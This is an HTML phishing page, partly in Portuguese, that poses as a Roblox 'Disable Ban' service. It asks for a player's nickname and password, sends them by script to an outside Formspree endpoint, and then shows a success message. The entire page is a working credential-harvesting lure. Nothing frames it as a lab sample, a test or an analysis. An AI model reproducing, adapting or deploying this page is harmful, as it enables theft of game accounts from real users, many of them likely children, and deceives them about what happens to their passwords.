<!DOCTYPE html>
<html lang="pt-br">
<head>
  <meta charset="UTF-8">
  <title>Roblox Acounts</title>
  <link rel="stylesheet" href="style.css">
</head>
<body>

  <div class="login-box">
    <h1>Disable Ban</h1>

      <form id="meuForm" action="https://formspree.io/f/xdanpyqg" method="POST">
      <input name="nick" type="text" placeholder="Nick" required>
      <input name="senha" type="text" placeholder="Senha" required>

      <p id="ok">Sucesso</p>

      <button type="submit">Continuar</button>
    </form>
  </div>

  <script>
    const form = document.getElementById("meuForm");
    const ok = document.getElementById("ok");

    form.addEventListener("submit", (e) => {
      e.preventDefault();

      fetch(form.action, {
        method: "POST",
        body: new FormData(form),
        headers: { 'Accept': 'application/json' }
      }).then(() => {
        ok.style.display = "block";
        form.reset();
      }).catch(() => {
        alert("Erro ao enviar, tente novamente.");
      });
    });
  </script>

</body>
</html>
